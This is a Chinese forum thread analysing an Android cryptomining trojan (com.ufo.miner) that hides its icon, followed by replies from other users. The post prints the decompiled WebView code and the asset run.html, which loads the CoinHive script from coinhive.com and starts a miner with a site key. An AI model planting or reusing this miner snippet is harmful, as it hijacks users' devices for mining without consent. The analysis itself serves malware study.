简单分析一个少见的安卓挖矿程序(CoinHive)

狄人3 · 发表于 2022-1-21 16:54

本帖最后由狄人3 于 2022-1-21 19:01 编辑

看到一个挂的木马，包名com.ufo.miner，安装后图标消失，在后台运行

没有root，要提取apk可以用adb
adb shell pm path {要看的包名}

之后pull出来就可以了，反编译看一下

非常简单，无壳无加密，直接看main

[Java] 纯文本查看 复制代码

        this.webView = (WebView)this.findViewById(0x7F080000);  // id:webView
        this.settings = this.webView.getSettings();
        this.settings.setJavaScriptEnabled(true);
        this.settings.setDomStorageEnabled(true);
        this.webView.loadUrl("file:///android_asset/run.html");
    }

很显然开了个webview然后加载run.html

那么再来看一下run.html

[HTML] 纯文本查看 复制代码

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
        var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE',{
        threads:4,
        throttle: 0.8
});
        miner.start();
</script>

然后去访问js地址，发现已经被人干了
这个是臭名昭著的Coinhive 家族的js挖矿病毒，具体可以看别人的分析，百度一下就好，但是我也是第一次看到安卓上的挖矿

现在访问这个域名会被重定向，告诉我们这是个浏览器挖矿，但是域名被他搞走了

其实感觉挺奇怪的，安卓就这点算力还要拿来挖矿。。。

aleng-79 · 发表于 2022-1-23 18:04

weiwei792071952 发表于 2022-1-22 19:41
听说现在有很多TV软件都是挖矿软件。。。我电视装了好几个不知道是不是挖矿的

电视的硬件不是还不如手机吗？

狄人3 · 发表于 2022-1-22 22:56

weiwei792071952 发表于 2022-1-22 19:41
听说现在有很多TV软件都是挖矿软件。。。我电视装了好几个不知道是不是挖矿的

卧槽，我这个就是一个tv的样本

weiwei792071952 · 发表于 2022-1-22 19:41

听说现在有很多TV软件都是挖矿软件。。。我电视装了好几个不知道是不是挖矿的

咔c君 · 发表于 2022-1-22 22:07

学习了不错

神的合法代言人 · 发表于 2022-1-22 22:25

第一次看到安卓挖矿的病毒

opensail · 发表于 2022-1-22 23:53

竟然还有安卓病毒来挖矿

jinxin6670 · 发表于 2022-1-23 08:51

weiwei792071952 发表于 2022-1-22 19:41
听说现在有很多TV软件都是挖矿软件。。。我电视装了好几个不知道是不是挖矿的

好像很多电视自带的

xingyuwan · 发表于 2022-1-23 09:46

我的摩托罗拉998++能不能挖矿

yjx_zjh · 发表于 2022-1-23 10:04

又学习到了

ayo123a · 发表于 2022-1-23 11:18

感觉知识又多了一点

帐号		自动登录	找回密码
密码			注册[Register]

[Android 原创] 简单分析一个少见的安卓挖矿程序(CoinHive)

免费评分